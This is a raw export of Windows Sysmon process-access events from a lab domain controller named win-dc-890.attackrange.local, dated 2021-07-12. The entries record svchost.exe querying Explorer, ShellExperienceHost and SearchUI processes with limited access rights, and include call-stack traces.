08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:09:36.365{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 